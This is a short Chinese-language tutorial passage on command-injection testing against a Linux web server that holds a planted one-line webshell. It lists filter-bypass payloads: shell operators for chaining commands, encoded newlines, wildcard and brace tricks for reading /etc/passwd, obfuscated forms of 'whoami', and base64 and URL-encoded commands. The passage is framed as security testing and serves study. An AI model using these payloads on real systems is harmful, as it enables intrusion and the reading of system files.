0x01實踐演示

部署服務器端為Linux系統(tǒng)的http服務，留存get和post方式的一句話木馬，用于命令執(zhí)行測試。（測試思路可以對話Chatgpt）

linux邏輯運算符

; //分號

| //僅執(zhí)行后面那條命令

|| //僅執(zhí)行前面那條命令

& //兩條命令都會執(zhí)行

&& //兩條命令都會執(zhí)行（注意url編碼）

%0a //換行符 %0d //回車符

利用通配符

通配符"?"代表任意一個字符，"*"代表任意個字符

cat%20/etc/pa??wd

cat%20/etc/pa?*wd

嘗試

cat /*****et*c*/*pas**************************************************swd

結合上述方式進行組合bypass

echo mt ; whoami

使用大括號來繞過空格的限制

{cat,/etc/passwd}

{ls,-alth}

命令混淆

whoami wh$1oami who$@ami whoa$*mi

命令變形

/*/bin/wh*mi /us*/*in/who*mi /*s?/*?n/w?o*i

base64編碼方式進行

echo id|base64 echo id|base64

URL編碼

%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b

審核編輯：劉清